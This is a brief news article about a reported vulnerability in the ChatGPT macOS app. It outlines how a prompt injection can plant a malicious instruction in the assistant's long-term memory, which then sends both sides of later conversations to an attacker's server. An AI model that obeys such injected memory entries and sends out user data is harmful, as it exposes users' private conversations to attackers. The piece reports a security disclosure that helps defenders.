Hacker creates fake memories in ChatGPT to steal victim data – but it may not be as bad as it sounds

Security researchers have exposed a vulnerability that could allow attackers to store malicious instructions in a user’s memory settings in the ChatGPT MacOS app.

A report by Johann Rehberger at Embrace the red noted how an attacker could trigger a prompt injection to take control of ChatGPT, and then insert a memory into its long-term storage and persistence mechanism. This leads to the exfiltration of the conversation on both sides directly to the attacker’s server.